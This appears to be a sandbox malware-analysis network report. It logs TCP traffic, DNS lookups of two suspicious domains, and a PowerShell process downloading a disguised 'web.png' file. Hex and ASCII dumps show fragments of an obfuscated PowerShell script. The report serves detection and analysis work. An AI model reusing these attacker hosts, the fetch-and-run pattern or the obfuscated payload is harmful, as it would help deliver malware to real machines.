Jan 1, 2025 17:11:16.474926949 CET	443	49855	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.474975109 CET	49855	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.475002050 CET	443	49855	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.475089073 CET	443	49855	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.475135088 CET	49855	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.475275040 CET	49855	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.475286007 CET	443	49855	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.475295067 CET	49855	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.475298882 CET	443	49855	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.582561016 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.582576036 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:16.582669020 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.582927942 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:16.582938910 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.055376053 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.055447102 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.056413889 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.056421995 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.056618929 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.057610989 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.057739019 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.057761908 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.057812929 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.057818890 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.658088923 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.658193111 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.658252954 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.658395052 CET	49865	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.658411026 CET	443	49865	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.677798033 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.677834988 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:17.677930117 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.678153038 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:17.678168058 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.138803959 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.138884068 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.140081882 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.140091896 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.140330076 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.141726017 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.141834021 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.142313957 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.658149004 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.658216000 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.658267021 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.658471107 CET	49871	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.658483982 CET	443	49871	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.738953114 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.738971949 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:18.739036083 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.739331961 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:18.739343882 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.224694967 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.224757910 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.226162910 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.226175070 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.226548910 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.229068995 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.229198933 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.229237080 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.229294062 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.229305029 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.852219105 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.852313042 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:19.852371931 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.853379011 CET	49881	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:19.853395939 CET	443	49881	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.019084930 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.019126892 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.019201040 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.019421101 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.019432068 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.475455046 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.475519896 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.476479053 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.476485968 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.476682901 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.477720022 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.477794886 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.477798939 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.893285036 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.893400908 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:20.893502951 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.893609047 CET	49888	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:20.893629074 CET	443	49888	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.324610949 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.324642897 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.324733973 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.325232983 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.325248957 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.780821085 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.780893087 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.782526016 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.782536983 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.782774925 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.784156084 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.786689043 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.786736965 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.786829948 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.786869049 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.786977053 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787024975 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787163019 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787195921 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787349939 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787383080 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787528992 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787554979 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787580013 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787585974 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787707090 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787734032 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.787756920 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787889004 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.787923098 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.796673059 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.796874046 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.796905041 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:21.796928883 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.796982050 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:21.799158096 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.336900949 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.336973906 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.337059021 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.337225914 CET	49899	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.337241888 CET	443	49899	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.342329979 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.342349052 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.342432022 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.342658043 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.342668056 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.796685934 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.796765089 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.798500061 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.798506021 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.798701048 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:24.799812078 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.799904108 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:24.799925089 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.246870041 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.246908903 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.246937037 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.246977091 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.246978045 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.246987104 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.247016907 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.247705936 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.247734070 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.247761965 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.247762918 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.247770071 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.247818947 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.248315096 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.248374939 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.251595974 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.251682997 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.251739979 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.251795053 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.251795053 CET	49918	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:11:25.251806974 CET	443	49918	188.114.96.3	192.168.2.4
Jan 1, 2025 17:11:25.251813889 CET	443	49918	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:10:03.090797901 CET	51236	53	192.168.2.4	1.1.1.1
Jan 1, 2025 17:10:03.101011992 CET	53	51236	1.1.1.1	192.168.2.4
Jan 1, 2025 17:11:14.464052916 CET	56555	53	192.168.2.4	1.1.1.1
Jan 1, 2025 17:11:14.477303982 CET	53	56555	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 17:10:03.090797901 CET	192.168.2.4	1.1.1.1	0xf80e	Standard query (0)	cc.klipjaqemiu.shop	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:11:14.464052916 CET	192.168.2.4	1.1.1.1	0xda9b	Standard query (0)	noisercluch.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 17:10:03.101011992 CET	1.1.1.1	192.168.2.4	0xf80e	No error (0)	cc.klipjaqemiu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:10:03.101011992 CET	1.1.1.1	192.168.2.4	0xf80e	No error (0)	cc.klipjaqemiu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:11:14.477303982 CET	1.1.1.1	192.168.2.4	0xda9b	No error (0)	noisercluch.click	188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:11:14.477303982 CET	1.1.1.1	192.168.2.4	0xda9b	No error (0)	noisercluch.click	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cc.klipjaqemiu.shop

noisercluch.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	188.114.96.3	443	2108	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:10:03 UTC	76	OUT	GET /web.png HTTP/1.1 Host: cc.klipjaqemiu.shop Connection: Keep-Alive
2025-01-01 16:10:03 UTC	982	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:10:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 8475282 Connection: close X-Powered-By: Express ETag: W/"815292-ZLO5PXEPNkzfvJsLmcITlIQ+ErY" Set-Cookie: connect.sid=s%3ARbuu9gVQArSmXEI1yx15vaOlyMXfUVPB.GCCoIluFg6CH%2Fc7VB5iwi2gpuoGp2NY7abuMeDihUlQ; Path=/; HttpOnly cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIjVkQ4jALTfYhl4yPWyoT07vMO7%2BCBwzuaWlGO833ZXU0ufWGasB45CFtBruKse4Bm8mEy%2BMymmCv1ySNAwR8enMtw3sKbH0wRPya%2FcYzvqjXnfOBdNzgCxcJ8EbkAx4Z8qql9x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c6fd2e984379-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1607&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=690&delivery_rate=1699650&cwnd=200&unsent_bytes=0&cid=e7c9fd1183da1686&ts=389&x=0"
2025-01-01 16:10:03 UTC	387	IN	Data Raw: 0d 0a 24 79 64 4f 74 77 6b 46 68 20 3d 20 28 28 28 28 28 39 32 38 39 34 31 20 2a 20 2d 31 31 29 20 2b 20 28 28 28 28 31 31 32 38 35 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2b 20 37 31 36 33 36 36 29 20 2b 20 34 35 34 29 29 29 20 2a 20 2d 34 38 37 29 20 2d 20 32 37 33 31 29 20 2b 20 2d 38 38 29 0d 0a 24 52 72 48 56 77 4e 57 46 6b 70 52 20 3d 20 28 28 28 28 28 28 36 38 39 39 38 20 2a 20 28 28 28 28 28 28 34 31 30 37 30 39 20 2a 20 33 36 37 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 35 39 29 29 29 20 2a 20 28 28 28 28 2d 39 20 2a 20 2d 31 29 20 2d 20 32 36 34 34 35 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70 Data Ascii: $ydOtwkFh = (((((928941 * -11) + ((((11285 * $ydOtwkFh) + 716366) + 454))) * -487) - 2731) + -88)$RrHVwNWFkpR = ((((((68998 * ((((((410709 * 367) + $RrHVwNWFkpR) * $ydOtwkFh) - $ydOtwkFh) - 59))) * ((((-9 * -1) - 26445) + $RrHVwNWFkpR))) - $RrHVwNWFkp
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 79 70 20 2d 20 2d 31 32 33 31 39 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 29 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 4b 76 48 6f 6a 56 52 4b 6f 20 3d 20 28 28 28 28 24 79 64 4f 74 77 6b 46 68 20 2b 20 39 38 30 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2d 20 2d 35 31 35 33 31 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 0d 0a 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 31 38 33 29 20 2d 20 35 34 32 35 29 20 2b 20 2d 37 38 30 29 20 2a 20 24 79 51 55 49 4d 48 68 57 29 0d 0a 24 6c 4b 76 48 73 76 53 46 4b 68 20 3d 20 28 28 24 79 64 4f 74 77 6b 46 68 20 2d 20 28 28 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 4d 6c 6a 77 4a 72 79 70 29 Data Ascii: yp - -12319) - $ydOtwkFh))) + $ydOtwkFh)$KvHojVRKo = (((($ydOtwkFh + 980) + $RrHVwNWFkpR) - -51531) * $RrHVwNWFkpR)$yQUIMHhW = ((((($MljwJryp + $ydOtwkFh) * -183) - 5425) + -780) * $yQUIMHhW)$lKvHsvSFKh = (($ydOtwkFh - (((((($lKvHsvSFKh - $MljwJryp)
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 51 4f 45 29 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 5a 6f 4d 77 7a 6f 20 3d 20 28 28 28 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2a 20 28 28 28 36 37 35 31 36 38 20 2a 20 2d 39 32 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 31 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 2d 38 30 30 34 35 29 20 2b 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2a 20 35 32 36 34 34 34 29 20 2d 20 24 6a 5a 79 4a 78 78 41 6c 59 29 20 2d 20 35 38 32 37 32 29 0d 0a 24 7a 66 71 72 71 73 48 73 49 66 6d 20 3d 20 28 28 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 4b 76 48 6f 6a 56 52 4b 6f 29 0d 0a 24 71 6f 46 70 4c 68 6e 66 20 3d 20 28 28 Data Ascii: QOE) - $fkuVbXZoeVZ) * $ydOtwkFh)$ZoMwzo = ((((($AuQDBhGZK * (((675168 * -92) * $RrHVwNWFkpR))) * ((((-1 + $lKvHsvSFKh) * -80045) + $yQUIMHhW))) * 526444) - $jZyJxxAlY) - 58272)$zfqrqsHsIfm = (($soeKiYDkqeY + $lKvHsvSFKh) * $KvHojVRKo)$qoFpLhnf = ((
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 6a 75 55 62 59 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 20 2a 20 2d 37 39 34 30 37 29 20 2a 20 36 29 0d 0a 20 20 20 20 69 66 20 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2d 6c 74 20 24 71 6f 46 70 4c 68 6e 66 29 20 2d 6f 72 20 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 65 71 20 2d 33 32 35 32 29 20 2d 6f 72 20 28 38 20 2d 67 65 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2d 6f 72 20 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 67 74 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 6e 4e 73 4c 73 4c 62 53 47 20 3d 20 28 28 28 24 7a 66 71 72 71 73 48 73 49 66 6d 20 2b 20 2d 33 35 39 38 29 20 2b 20 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 20 2d 34 34 29 29 29 20 2d Data Ascii: juUbY) + $ggJdTVtnpC))) * -79407) * 6) if (($AuQDBhGZK -lt $qoFpLhnf) -or ($RrHVwNWFkpR -eq -3252) -or (8 -ge $zfqrqsHsIfm) -or ($ZciUjuUbY -gt $lKvHsvSFKh)) { $nNsLsLbSG = ((($zfqrqsHsIfm + -3598) + ((($lKvHsvSFKh - $soeKiYDkqeY) - -44))) -
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 0a 20 20 20 20 69 66 20 28 28 34 36 20 2d 6c 65 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 61 6e 64 20 28 32 20 2d 6e 65 20 2d 32 29 20 2d 61 6e 64 20 28 24 67 67 4a 64 54 56 74 6e 70 43 20 2d 6c 65 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 67 48 66 64 72 4f 46 20 3d 20 28 28 28 28 28 28 28 2d 31 36 35 33 33 30 20 2d 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2a 20 28 28 28 28 2d 39 38 35 39 37 20 2d 20 24 71 6f 46 70 4c 68 6e 66 29 20 2a 20 33 38 37 39 30 29 20 2a 20 37 32 33 35 38 37 29 29 29 20 2b 20 2d 38 35 36 35 29 20 2b 20 28 28 28 28 24 56 41 58 70 51 68 20 2d 20 2d 37 34 34 32 35 29 20 2b 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2a 20 24 41 75 51 44 42 68 47 5a 4b 29 29 29 20 2b 20 2d 35 39 36 31 Data Ascii: if ((46 -le $soeKiYDkqeY) -and (2 -ne -2) -and ($ggJdTVtnpC -le $AnPtnCJVAPJ)) { $gHfdrOF = (((((((-165330 - $zdtmPCIdje) * ((((-98597 - $qoFpLhnf) * 38790) * 723587))) + -8565) + (((($VAXpQh - -74425) + $soeKiYDkqeY) * $AuQDBhGZK))) + -5961
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 29 20 2b 20 31 38 29 20 2a 20 28 28 28 28 28 24 66 6b 75 56 62 58 5a 6f 65 56 5a 20 2d 20 2d 35 35 31 32 37 29 20 2d 20 28 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2b 20 2d 32 29 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 24 4a 4f 44 52 52 75 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 29 20 2a 20 28 28 28 28 2d 38 32 30 20 2d 20 33 38 34 39 29 20 2d 20 36 37 30 29 20 2b 20 2d 33 32 33 34 30 34 29 20 2b 20 31 30 29 29 29 29 29 29 20 2a 20 2d 37 32 33 33 29 20 2a 20 35 37 33 37 34 29 29 20 2b 20 28 28 36 30 20 2a 20 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 24 4a 4f 44 52 52 75 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2d 20 37 29 29 29 20 2d 20 34 33 38 35 29 29 0d 0a 24 74 78 64 7a Data Ascii: ) + 18) * ((((($fkuVbXZoeVZ - -55127) - (((((($zdtmPCIdje + -2) + $lKvHsvSFKh) - $lKvHsvSFKh) + $JODRRu) - $ggJdTVtnpC)))) * ((((-820 - 3849) - 670) + -323404) + 10)))))) * -7233) * 57374)) + ((60 * (((($XrvKlj - $JODRRu) * $ZoMwzo) - 7))) - 4385))$txdz
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2b 20 2d 35 35 33 31 34 29 29 29 20 2a 20 32 37 30 29 0d 0a 20 20 20 20 24 67 59 65 52 44 68 62 52 4f 2d 2d 0d 0a 7d 0d 0a 69 66 20 28 28 36 34 36 39 20 2d 6c 74 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2d 6f 72 20 28 24 56 41 58 70 51 68 20 2d 6c 74 20 2d 31 32 39 29 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2a 20 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2b 20 28 28 28 2d 31 32 36 34 33 32 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 2d 35 31 35 39 30 33 29 29 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 71 6f 46 70 Data Ascii: + $ggJdTVtnpC) - $ggJdTVtnpC) + -55314))) * 270) $gYeRDhbRO--}if ((6469 -lt $zdtmPCIdje) -or ($VAXpQh -lt -129)) { $yQUIMHhW = ((((((($qoFpLhnf * ((((($qoFpLhnf + (((-126432 + $RrHVwNWFkpR) * -515903))) + $ggJdTVtnpC) - $lKvHsvSFKh) * $qoFp
2025-01-01 16:10:03 UTC	1369	IN	Data Raw: 2b 20 24 76 76 6b 45 44 50 61 62 29 20 2d 20 24 56 41 58 70 51 68 29 20 2b 20 28 28 28 28 28 28 35 37 34 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2a 20 24 4c 46 7a 68 4e 6f 62 6a 5a 29 20 2d 20 33 38 31 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 32 34 39 36 37 38 29 29 29 20 2d 20 2d 36 29 29 0d 0a 7d 0d 0a 24 51 4e 54 5a 43 42 20 3d 20 36 0d 0a 77 68 69 6c 65 20 28 24 51 4e 54 5a 43 42 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 6c 74 20 31 30 33 29 20 2d 61 6e 64 20 28 24 77 74 79 63 4a 42 51 4f 45 20 2d 6c 65 20 2d 35 31 37 35 37 38 29 20 2d 61 6e 64 20 28 24 62 48 43 78 7a 43 5a 20 2d 6c 74 20 30 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 50 4c 73 6e 47 7a 6e 52 5a 20 3d 20 Data Ascii: + $vvkEDPab) - $VAXpQh) + 